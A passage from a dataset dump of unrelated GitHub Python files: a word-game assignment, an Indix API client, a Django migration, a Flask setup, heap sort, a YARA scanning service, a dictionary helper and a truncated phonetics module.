open('scores.txt', 'w') as file:\n # file.write(json.dumps(points_dict))\n\n return points_dict\n\ndef get_word_rearrangements(word_list):\n for word in word_list:\n sorted_word = ''.join(sorted(word))\n rearrange_dict[sorted_word] = word\n return\n\ndef get_time_limit(points_dict, k):\n \"\"\"\n Return the time limit for the computer player as a function of the\n multiplier k.\n points_dict should be the same dictionary that is created by\n get_words_to_points.\n \"\"\"\n start_time = time.time()\n # Do some computation. 
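\n # (Added aside, not in the original: for a tiny hand the helpers above give\n # sorted(get_hand_subsets({'a': 2, 'b': 1})) == ['a', 'aa', 'aab', 'ab', 'b'],\n # so pick_best_word_faster needs only one rearrange_dict lookup per subset\n # rather than a scan over the whole word list.)\n # 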
The only purpose of the computation is so we can\n # figure out how long your computer takes to perform a known task.\n for word in points_dict:\n get_frequency_dict(word)\n get_word_score(word, HAND_SIZE)\n end_time = time.time()\n return (end_time - start_time) * k\n\n\n# word_list = load_words()\n# print(is_valid_word('honey', {'n': 0, 'h': 1, 'o': 1, 'y': 1, 'd': 1, 'w': 1, 'e': 2}, word_list))\n\n#\n# Problem #4: Playing a hand\n#\ndef play_hand(hand, word_list, points_dict):\n \"\"\"\n Allows the user to play the given hand, as follows:\n\n * The hand is displayed.\n \n * The user may input a word.\n\n * An invalid word is rejected, and a message is displayed asking\n the user to choose another word.\n\n * When a valid word is entered, it uses up letters from the hand.\n\n * After every valid word: the score for that word and the total\n score so far are displayed, the remaining letters in the hand \n are displayed, and the user is asked to input another word.\n\n * The sum of the word scores is displayed when the hand finishes.\n\n * The hand finishes when there are no more unused letters.\n The user can also finish playing the hand by inputing a single\n period (the string '.') instead of a word.\n\n * The final score is displayed.\n\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n score = 0\n elapsed_time = 0;\n print()\n # while True:\n # try:\n # time_limit = float(input(\"Enter time limit, in seconds, for players: \"))\n # break\n # except ValueError:\n # print(\"Please enter a valid number...\")\n\n time_limit = TIME_LIMIT \n \n while(True):\n\n if sum(hand.values())==0:\n break;\n\n print()\n print('Current Hand')\n display_hand(hand)\n # print(sum(hand.values()))\n \n start_time = time.time()\n # guess = input(\"Enter word, or a . to indicate that you are finished: \")\n # guess = pick_best_word(hand, points_dict)\n guess = pick_best_word_faster(hand, rearrange_dict)\n end_time = time.time()\n\n\n word_time = end_time - start_time\n if word_time<.1:\n word_time = .1;\n\n elapsed_time = elapsed_time + word_time\n\n\n print('It took %0.2f seconds to provide an answer.' % word_time)\n\n if elapsed_time>time_limit:\n print('\\nTotal time exceeds {0:0.0f} seconds. You scored {1:0.2f} points.'.format(time_limit, score))\n return 0\n\n if guess == '.':\n print()\n break\n \n # if (is_valid_word(guess, hand, word_list)==False):\n # print()\n # print(\"Invalid guess. 
Try again:\")\n # print()\n\n else: \n hand = update_hand(hand, guess)\n points = get_word_score(guess, HAND_SIZE) / word_time\n score = score + points\n print(str(guess).upper()+' earned %0.2f points' % points)\n print('Total Score: %0.2f' % score) \n print()\n \n print('********************')\n print('TOTAL SCORE: '+str(score))\n print('********************')\n return 0 \n\n#\n# Problem #5: Playing a game\n# Make sure you understand how this code works!\n# \ndef play_game(word_list):\n \"\"\"k\n Allow the user to play an arbitrary number of hands.\n\n * Asks the user to input 'n' or 'r' or 'e'.\n\n * If the user inputs 'n', let the user play a new (random) hand.\n When done playing the hand, ask the 'n' or 'e' question again.\n\n * If the user inputs 'r', let the user play the last hand again.\n\n * If the user inputs 'e', exit the game.\n\n * If the user inputs anything else, ask them again.\n \"\"\"\n # TO DO ...\n # print(\"play_game not implemented.\") # delete this once you've completed Problem #4\n # play_hand(deal_hand(HAND_SIZE), word_list) # delete this once you've completed Problem #4\n # play_hand({'n': 1, 'h': 1, 'o': 1, 'y': 1, 'd':1, 'w':1, 'e': 2}, word_list)\n ## uncomment the following block of code once you've completed Problem #4\n \n hand = deal_hand(HAND_SIZE) # random init\n while True:\n cmd = input('Enter n to deal a new hand, r to replay the last hand, or e to end game: ')\n if cmd == 'n':\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list, points_dict)\n print()\n elif cmd == 'r':\n play_hand(hand.copy(), word_list, points_dict)\n print()\n elif cmd == 'e':\n break\n else:\n print(\"Invalid command.\") \n\n#\n# Build data structures used for entire session and play game\n#\nif __name__ == '__main__':\n word_list = load_words()\n get_words_to_points(word_list)\n get_word_rearrangements(word_list)\n TIME_LIMIT = get_time_limit(points_dict,5)\n play_game(word_list)\n # print('TIME LIMIT: ', TIME_LIMIT)\n\n\n# PS06 Problem #5\n# It seems that...\n# pick_best_word will be O(n) where n is the number of words in the word list\n# pick_best_word_faster will be O(1) since our hand size is fixed\n# ...thus our number of hand multisets will remain constant as well\n# ...leaving us just about the same number of operations each time\n# ...some minimal variation depending on length of our words if we pick more than one\n\n\n","repo_name":"daytonpe/mit-6.00","sub_path":"ps06/ps6.py","file_name":"ps6.py","file_ext":"py","file_size_in_byte":13137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5743274408","text":"import requests\nimport json\nimport os\n\n\nclass indixException(Exception):\n pass\n\nclass indixRestException(indixException):\n \"\"\" This should do something with error codes from indix. 
Maybe.\n\n :param int status: the error code\n :param str uri: the url\n :param str msg: the message, if one exists\n \"\"\"\n def __init__(self, status, uri, msg=\"\"):\n self.uri=uri\n self.status=status\n self.msg=msg\n\n def __str__(self):\n return \"ERROR %s: %s (%s)\" % (self.status, self.msg, self.uri)\n\ndef find_credentials():\n \"\"\"Look in the current environment for indix account creds\"\"\"\n try:\n app_id = os.environ[\"INDIX_APP_ID\"]\n app_key = os.environ[\"INDIX_APP_KEY\"]\n return app_id, app_key\n except:\n return None, None\n\ndef make_request(base_uri, endpoint, **kwargs):\n \"\"\"\n Magic function that makes the actual HTTP request\n Takes first two params to make the url, **kwargs get added as GET request\n \"\"\"\n full_url = \"%s/%s/?\" % (base_uri, endpoint)\n for key, value in kwargs.items():\n full_url = \"%s%s=%s&\" % (full_url, key, value)\n response = requests.get(full_url)\n return response\n\ndef pretty_print(json_to_print, sort_keys=True):\n \"\"\"A little convenience function for pretty pringing of json\"\"\"\n print(json.dumps(json_to_print, sort_keys=sort_keys, indent=4, separators=(',', ': ')))\n\n\nclass IndixRestClient(object):\n \"\"\"\n A client for accessing the indix REST API\n :param str app_id: The app ID\n :param str app_key: The app key\n \"\"\"\n\n def __init__(self, app_id=None, app_key=None, base=\"http://api.indix.com/api\", version=\"beta\"):\n \"\"\"Create a indix REST API client.\"\"\"\n # Get account creds\n if not app_id or not app_key:\n app_id, app_key = find_credentials()\n if not app_id or not app_key:\n raise indixException(\"\"\"You need app_id and app_key when you initialize stuff,\n or add environment variables (see readme)\"\"\")\n\n self.base = base\n self.app_id, self.app_key = app_id, app_key\n self.version_uri = \"%s/%s\" % (base, version)\n\n def brands(self, query=None):\n \"\"\"\n :param query: the brand you want to search for\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"brands\", query=query,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n \n def stores(self, query=None):\n \"\"\"\n :param query: the stores you want to search for\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"stores\", query=query,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def categories(self):\n \"\"\"\n Takes not params. 
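Illustrative usage (added; not in the original):\n >>> ix = IndixRestClient(app_id='my_id', app_key='my_key')\n >>> cats = ix.categories()\n 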
Returns JSON for all possible categories\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"categories\",\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def products(self, pageNumber=1, query=\"\", storeId=\"\", brandId=\"\", categoryId=\"\",\n startPrice=\"\", endPrice=\"\", sortBy=\"\", priceHistoryAvail=False):\n \"\"\"\n :param int pageNumber: page number to get\n :param query: product to search for\n :param storeId: storeId, from indix.stores\n :param brandId: brandId, from indix.brands\n :param categoryId: categoryId, from indix.categories\n :param startPrice: low price\n :param endPrice: high price\n :sortBy: must be one of: \"RELEVANCE\", \"PRICE_LOW_TO_HIGH\", \"PRICE_HIGH_TO_LOW\", \"MOST_RECENT\"\n or blank\n :priceHistoryAvail bool: if True, will only return products with price history available\n Returns: request object from requests.get for 10 products\n \"\"\"\n response = make_request(self.version_uri, \"products\", pageNumber=pageNumber, query=query,\n storeId=storeId, brandId=brandId, categoryId=categoryId,\n startPrice=startPrice, endPrice=endPrice, sortBy=sortBy,\n priceHistoryAvail=priceHistoryAvail,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def productById(self, id=None, pageNumber=1):\n \"\"\"\n :param id: productId from indix.products\n :param pageNumber: page number\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"products/%s\" % id, pageNumber=pageNumber,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def pricesById(self, id=None):\n \"\"\"\n :param id: productId from indix.products\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"products/%s/prices\" % id,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def raw(self, endpoint=None, **kwargs):\n \"\"\"\n :param endpoint: the url to add to the end of api.indix.com/api/beta/\n :param **kwargs: dictionary of extra things to add to url as a GET request\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, endpoint,\n app_id=self.app_id, app_key=self.app_key, **kwargs)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n","repo_name":"mtbentley/indix","sub_path":"indix.py","file_name":"indix.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25722851379","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AgeGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=45)),\n ],\n 
options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AgeGroupTask',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('age_group', models.ForeignKey(to='bober_tasks.AgeGroup', on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.TextField(null=True)),\n ('label', models.CharField(default=b'', max_length=8, blank=True)),\n ('correct', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('acronym', models.CharField(max_length=5)),\n ('title', models.CharField(max_length=45)),\n ('description', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DifficultyLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=45)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Remark',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment', models.TextField()),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Resources',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('filename', models.CharField(max_length=90)),\n ('type', models.CharField(max_length=40)),\n ('language', models.CharField(max_length=8, choices=[(b'sl', 'Slovenian')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('international_id', models.CharField(max_length=16)),\n ('interaction_type', models.CharField(max_length=45)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('author', models.CharField(max_length=128, blank=True)),\n ('age_groups', models.ManyToManyField(to='bober_tasks.AgeGroup', through='bober_tasks.AgeGroupTask')),\n ('categories', models.ManyToManyField(to='bober_tasks.Category')),\n ('difficulty_levels', models.ManyToManyField(to='bober_tasks.DifficultyLevel', through='bober_tasks.AgeGroupTask')),\n ('parent', models.ForeignKey(to='bober_tasks.Task', null=True, on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TaskTranslation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=90)),\n ('body', models.TextField()),\n ('solution', models.TextField()),\n ('it_is_informatics', models.TextField(blank=True)),\n ('language_locale', models.CharField(blank=True, max_length=8, null=True,\n choices=[(b'sl', 'Slovenian')])),\n ('comment', models.TextField(null=True)),\n ('version', models.IntegerField(default=1)),\n ('timestamp', models.DateTimeField(auto_now_add=True, null=True)),\n ('correct_answer', models.ForeignKey(to='bober_tasks.Answer', 
null=True, on_delete=models.CASCADE)),\n ('task', models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE)),\n ('translator', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='resources',\n name='task',\n field=models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remark',\n name='task_translation',\n field=models.ForeignKey(to='bober_tasks.TaskTranslation', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remark',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='difficultylevel',\n name='tasks',\n field=models.ManyToManyField(to='bober_tasks.Task', through='bober_tasks.AgeGroupTask'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='answer',\n name='task_translation',\n field=models.ForeignKey(to='bober_tasks.TaskTranslation', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegrouptask',\n name='difficulty_level',\n field=models.ForeignKey(to='bober_tasks.DifficultyLevel', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegrouptask',\n name='task',\n field=models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegroup',\n name='tasks',\n field=models.ManyToManyField(to='bober_tasks.Task', through='bober_tasks.AgeGroupTask'),\n preserve_default=True,\n ),\n ]\n","repo_name":"polz113/bober","sub_path":"django/bober/bober_tasks/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"36838784025","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request\nimport sys\nsys.path.append(os.path.dirname(__file__) + '/..')\nimport config\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nimport logging\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_mail import Mail\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_babel import Babel, lazy_gettext as _l\nfrom sqlalchemy import MetaData\n\nconvention = {\n \"ix\": 'ix_%(column_0_label)s',\n \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n \"pk\": \"pk_%(table_name)s\"\n}\n\nmetadata = MetaData(naming_convention=convention)\n\n\n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\napp.config.from_object(Config)\ndb = SQLAlchemy(app, metadata=metadata)\nmail = Mail(app)\nmigrate = Migrate(app, db)\nmoment = Moment(app)\nbabel = Babel(app)\nlogin = LoginManager(app)\nlogin.login_view = 'login'\nlogin.login_message = _l('Please log in to access this page.')\n\n\n\n\nif not app.debug:\n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n secure = None\n if app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = 
SMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n toaddrs=app.config['ADMINS'], subject='ImportService Failure',\n credentials=auth, secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n if app.config['LOG_TO_STDOUT']:\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n app.logger.addHandler(stream_handler)\n else: \n if not os.path.exists('logs'):\n os.mkdir('logs')\n file_handler = RotatingFileHandler('logs/ImportService.log', maxBytes=10240,\n backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n \n app.logger.setLevel(logging.INFO)\n app.logger.info('ImportService startup')\n\ndef get_locale():\n return request.accept_languages.best_match(app.config['LANGUAGES'])\n\nbabel.init_app(app, locale_selector=get_locale)\n\nwith app.app_context():\n db.create_all()\n\nfrom app import routes, models, errors","repo_name":"ElizavetaWow/TestTasks","sub_path":"ПроКомплаенс/ImportService/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33900010047","text":"from build_max_heap import *\n\ndef heap_sort(A:list):\n heap = Heap.Heap(A)\n build_max_heap(heap)\n n = heap.size\n for i in range(n - 1, 0, -1):\n # Stop when there's only one item in the heap\n A[i], heap.data[0] = heap.data[0], A[i]\n heap.size -= 1\n max_heapify(heap, 0)\n\ndef test_heap_sort():\n A = [16, 14, 10, 8, 7, 9, 3, 2, 4, 1]\n A = [5, 13, 2, 25, 7, 17, 20, 8, 4]\n print(A)\n heap_sort(A)\n print(A)\n\ntest_heap_sort()\n","repo_name":"JasonVann/CLRS","sub_path":"S2_SortingAndOrderStatistics/C6_Heapsort/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9497349559","text":"import yara\nimport os\nfrom models import RequestModel, CustomMatch, CustomStringMatch, CustomStringMatchInstance, \\\n ResponseModel\nimport utils\n\n\ndef analyze_data(obj: RequestModel):\n return ResponseModel(matches=match(obj.rules, obj.data, obj.complete_scan))\n\n\n# configures the yara-rules module and check the data\ndef match(rules: str, data: str, complete_scan: bool):\n response: list[CustomMatch] = []\n # scan using rules in the directory 'ReversingLabs-Yara-Rules'\n if complete_scan:\n rule = yara.compile(filepaths=scan_files())\n matches = rule.match(data=data)\n response += create_iterable_object(matches)\n\n # scan using custom rules sent in the json request\n if rules:\n #return an exception if the rules are not valid\n rule = yara.compile(source=rules)\n matches = rule.match(data=data)\n response += create_iterable_object(matches)\n\n return response\n\n\n# creates a dictionary with all the 'filename': 'filepath' of the rules used from ReversingLabs (\n# https://github.com/reversinglabs/reversinglabs-yara-rules.git)\ndef scan_files():\n path = 'ReversingLabs-Yara-Rules/yara-rules'\n rules_files: dict = {}\n for dir in os.listdir(path):\n for file in os.listdir(path + '/' + dir):\n rules_files.update({os.path.splitext(file)[0]: path + '/' + dir + '/' + file})\n return rules_files\n\n\ndef create_iterable_object(matches_: list[yara.Match]):\n # since the 
nested object inside yara-rules's response are not serializable, here is the conversion in custom objects\n # the class declarations of these custom objs are in models.py file\n # the original yara-rules objs structure is at https://yara.readthedocs.io/en/stable/yarapython.html\n custom_matches = []\n for x in matches_:\n custom_string_matches = []\n for y in x.strings:\n custom_string_match_instances = []\n\n for z in y.instances:\n custom_string_match_instances.append(\n CustomStringMatchInstance(matched_data=z.matched_data,\n matched_length=z.matched_length,\n offset=z.offset, xor_key=z.xor_key,\n plaintext=utils.yara_string_match_instance_plaintext(z.matched_data,\n z.xor_key)))\n\n custom_string_matches.append(CustomStringMatch(identifier=y.identifier, is_xor=bool(y.is_xor),\n instances=custom_string_match_instances))\n custom_match = CustomMatch(rule=x.rule, meta=str(x.meta), string_match=custom_string_matches)\n custom_matches.append(custom_match)\n\n return custom_matches\n","repo_name":"CiccioGallo13/ThesisProject","sub_path":"YaraVisualizerBackend/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33842489858","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Note, Profile\nfrom .forms import NoteForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.views import login_required\nfrom accounts.forms import MyFilter\nfrom django.core.paginator import Paginator, EmptyPage,PageNotAnInteger\n\n# Create your views here.\n\n# <<---------------------------------------------------------------------------------------------------------->>\n# <<------------------------------------------ Correct ------------------------------------------------------->>\ndef home(request):\n user= request.user\n profile = get_object_or_404(Profile, user = user)\n home_notes = Note.objects.all()\n filter = MyFilter(request.GET, queryset=home_notes)\n home_notes = filter.qs\n #<<---------------------------------Pagination--------------------------------------------------------------->>\n p = Paginator(home_notes, 2)\n page = request.GET.get('page')\n try:\n home_notes = p.page(page)\n except PageNotAnInteger:\n home_notes = p.page(1)\n except EmptyPage:\n home_notes = p.num_pages\n\n context = {\n 'home_notes' : home_notes,\n 'profile' : profile,\n 'filter' : filter,\n 'p' : p,\n }\n return render(request, 'home.html', context)\n\n@login_required(login_url='accounts:login')\ndef user_notes(request):\n user=request.user\n user_notes = Note.objects.filter(user=user)\n filter = MyFilter(request.GET, queryset=user_notes)\n user_notes = filter.qs\n profile = get_object_or_404(Profile, user=user)\n context = {\n 'user_notes' : user_notes,\n 'profile' : profile,\n 'filter' : filter,\n }\n return render(request, 'user_notes.html', context)\n\n@login_required(login_url='accounts:login')\ndef one_note(request, slug, one_note_id):\n user = request.user\n profile = get_object_or_404(Profile, user = user)\n one_note = Note.objects.get(slug=slug, pk=one_note_id)\n context = {\n 'one_note' : one_note,\n 'profile' : profile,\n }\n return render(request, 'one_note.html', context)\n@login_required(login_url='accounts:login')\ndef edit_note(request, slug, edit_id):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n note = get_object_or_404(Note,slug=slug, pk=edit_id)\n if request.method == 'POST':\n form = 
NoteForm(request.POST, instance=note)\n if form.is_valid():\n new_form = form.save(commit=False)\n new_form.user = request.user\n new_form.save()\n # slug = slug\n # edit_id = note.id\n #url = f\"one_note/{slug}/{edit_id}\"\n return redirect('home:one_note', note.slug, note.id)\n else:\n form = NoteForm(instance=note)\n context = {\n 'form' : form,\n 'profile' : profile,\n }\n return render(request, 'edit_note.html', context)\n@login_required(login_url='accounts:login')\ndef add_note(request):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n if request.method == 'POST':\n form = NoteForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n form = NoteForm()\n context = {\n 'form' : form,\n 'profile' : profile,\n }\n return render(request, 'add_note.html', context)\n# <<---------------------------------------------------------------------------------------------------------->>\n#<<----------------------------------------------------------------------------------------------------------->>\n@login_required(login_url='accounts:login')\ndef profile(request):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n #profile_notes = Note.objects.filter(user=user)\n context = {\n 'profile' : profile,\n }\n return render(request, 'profile.html', context)\n\ndef delete(request, note_id):\n note = Note.objects.get(pk=note_id)\n if request.method == 'POST':\n note.delete()\n return redirect('/')\n context = {'note' : note,}\n return render(request, 'remove.html', context)","repo_name":"ZakariaBrahimi/Notes__App","sub_path":"Scripts/src/Notes_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13730037738","text":"from copy import deepcopy\n\n\nclass FallbackDictWrapper:\n \"\"\"\n A wrapper for a dict that allows to access values by a stack of keys.\n Used for the theme-config and wherever else it might be useful.\n \"\"\"\n\n def __init__(self, dict, default_stack=None):\n self.dict = dict\n self.default_stack = default_stack\n\n def __getitem__(self, route: str):\n temp_dict = deepcopy(self.dict)\n default_stack = self.default_stack\n ret = None\n stack = None\n key = None\n\n # Preparing strings into lists for easier handling\n if default_stack is None:\n default_stack = []\n if isinstance(default_stack, str):\n default_stack = default_stack.split(\" \")\n elif isinstance(default_stack, list):\n pass\n else:\n raise TypeError(f\"Expected str or list, got {type(default_stack)}\")\n\n if isinstance(route, str):\n stack = route.split(\" \")\n elif isinstance(route, list):\n stack = route\n else:\n raise TypeError(f\"Expected str or list, got {type(route)}\")\n\n key, stack = stack[-1], stack[:-1]\n stack = default_stack + stack\n\n if len(stack) == 0:\n if key in temp_dict:\n ret = temp_dict[key]\n else:\n raise KeyError(f\"Key {key} not found in {temp_dict}\")\n return ret\n\n for d in stack:\n if key in temp_dict:\n ret = temp_dict[key]\n if d in temp_dict:\n temp_dict = temp_dict[d]\n else:\n raise KeyError(f\"Key {d} not found in {temp_dict}\")\n if key in temp_dict:\n ret = temp_dict[key]\n\n return ret\n\n def no_default(self):\n return FallbackDictWrapper(self.dict)\n\n def set_default(self, default_stack):\n self.default_stack = default_stack\n return 
self\n\n","repo_name":"kaesekarl/manim-slides-setup","sub_path":"src/designs/themes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21698729569","text":"from collections import Counter\nfrom functools import reduce, lru_cache\nfrom random import random\nimport operator\n\nBILABIAL = (0, {'positive': ['labial'], 'negative': ['syllabic']})\nAPICAL = (1, {'positive': ['coronal', 'anterior'], 'negative': ['syllabic']})\nPALATAL = (2, {'positive': ['distributed'], 'negative': ['anterior',\n 'syllabic']})\nVELAR = (3, {'positive': ['dorsal'], 'negative': ['syllabic']})\nGLOTTAL = (4, {'negative': ['labial', 'syllabic', 'coronal', 'dorsal']})\n\nFRONT = (5, {'positive': ['front'], 'negative': ['back']})\nCENTRAL = (6, {'negative': ['front', 'back']})\nBACK = (7, {'positive': ['back'], 'negative': ['front']})\n\nPHONETIC_CONSTANTS = [BILABIAL, APICAL, PALATAL, VELAR, GLOTTAL, FRONT,\n CENTRAL, BACK]\n\nLIQUID = {'positive': ['consonantal', 'approximant']}\nRHOTIC_VOWEL = {'positive': ['syllabic', 'coronal', 'anterior', 'distributed'],\n 'negative': ['strident']}\nFRICATIVE_OR_AFFRICATE = {'positive': ['delayedrelease']}\nVOICED = {'positive': ['voice']}\n\n\n@lru_cache(maxsize=None)\ndef classify_segment(segment):\n '''Given a segment, return all phonetic constants which apply to it, in a\n list.'''\n return [constant[0] for constant in PHONETIC_CONSTANTS if\n segment.meets_conditions(constant[1])]\n\n\ndef phonetic_product(word):\n '''Given a word, compute the Phonetic Product outlined by Harold R. Bauer in\n \"The ethologic model of phonetic development: I. Phonetic contrast\n estimators\" (1988).\n\n '''\n\n # Count all applicable features in the word.\n features = []\n for segment in word.segments:\n features.extend(classify_segment(segment))\n\n feature_count = Counter(features)\n\n # Multiply the counts together, adding one to each count. The initial value\n # is one in case of words with no special features.\n return reduce(operator.mul, map(lambda x: x + 1, feature_count.values()),\n 1)\n\n\ndef weighted_phonetic_product(word):\n '''Given a word, compute the Phonetic Product outlined by Harold R. Bauer in\n \"The ethologic model of phonetic development: I. 
Phonetic contrast\n estimators\" (1988), using weighted values by Carterette and Jones in\n \"Informal Speech: Alphabetic and Phonetic Texts with Statistical Analyses\n and Tables\" (1974).\n\n '''\n\n # Count all applicable features in the word.\n features = []\n for segment in word.segments:\n features.extend(classify_segment(segment))\n\n feature_count = Counter(features)\n\n segment_types = [feature_count[0] * 0.1658 + 1,\n feature_count[1] * 0.3149 + 1,\n feature_count[2] * 0.01129 + 1,\n feature_count[3] * 0.04945 + 1,\n feature_count[4] * 0.04945 + 1,\n feature_count[5] * 0.18 + 1,\n feature_count[6] * 0.1431 + 1,\n feature_count[7] * 0.0709 + 1]\n\n return reduce(operator.mul, segment_types)\n\n\ndef number_of_syllables(word):\n '''Given a word, compute the number of syllables it contains.'''\n CV_syllable_rule = {'before': {'negative': ['syllabic']},\n 'conditions': {'positive': ['syllabic']}}\n\n VC_syllable_rule = {'after': {'negative': ['syllabic']},\n 'conditions': {'positive': ['syllabic']}}\n\n syllables = 0\n\n for index in range(len(word.segments)):\n is_CV_syllable = word.index_applicable(index, CV_syllable_rule)\n is_VC_syllable = word.index_applicable(index, VC_syllable_rule)\n\n if is_VC_syllable 